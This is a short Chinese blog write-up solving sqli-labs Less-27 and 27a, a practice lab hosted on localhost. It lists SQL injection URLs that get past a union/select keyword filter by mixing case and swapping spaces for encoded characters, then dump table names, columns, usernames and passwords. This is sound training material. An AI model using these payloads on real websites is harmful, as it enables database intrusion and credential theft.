sqli-27,27a

27 -php5.3.8

过滤了union和select的

 

查看源码过滤是什么函数,uNion,sElect,我觉得就这样可以简单绕过了.

SQL注入闭合才是精华 ,我这么菜当然看源码

    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
秒懂 单引号闭合,自闭的情绪让我测的心情都没有了,直接源码!

http://127.0.0.1/sqli-labs/Less-27/?
id==1'%a0uniOn%a0sElEct%a01,database(),3%a0%26%26%a0'1'='1

http://127.0.0.1/sqli-labs/Less-27/?id=0'%0bUnIon%0bSeLect%0b1,database(),3'  #数据库

http://127.0.0.1/sqli-labs/Less-27/?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeLeCt/*%0a*/group_concat(table_name)/*%0a*/from/*%0a*/information_schema.tables/*%0a*/where/*%0a*/table_schema='security'),4/*%0a*/||/*%0a*/'1'='1`  #数据表

http://127.0.0.1/sqli-labs/Less-27/?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeLeCt/*%0a*/group_concat(column_name)/*%0a*/from/*%0a*/information_schema.columns/*%0a*/where/*%0a*/table_name='users'),4/*%0a*/||/*%0a*/'1'='1  #数据表的字段

http://127.0.0.1/sqli-labs/Less-27/?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/2,(SeLeCt/*%0a*/group_concat(concat_ws('$',id,username,password))/*%0a*/from/*%0a*/users),4/*%0a*/||/*%0a*/'1'='1  #数据

 27a

http://127.0.0.1/sqli-labs/Less-27a/?id=0%22/*%09*/unIon%09/*SeleCt*/%091,database%28%29,3%20||%221  #数据库

http://127.0.0.1/sqli-labs/Less-27a/?id=0"/*%09*/unIon%09/*SeleCt*/%091,(SeleCt%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema='security'),3||"1  #表

http://127.0.0.1/sqli-labs/Less-27a/?id=0"/*%09*/unIon%09/*SeleCt*/%091,(SeleCt%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema='security'%09and%09table_name='users'),3||"1  #字段

http://127.0.0.1/sqli-labs/Less-27a/?id=0"/*%09*/unIon%09/*SeleCt*/%091,(SeleCt%09group_concat(username,0x7e,password)%09from%09users),3||"1  #数据

posted @ 2020-04-27 17:24  llcnKill  阅读(263)  评论(0)    收藏  举报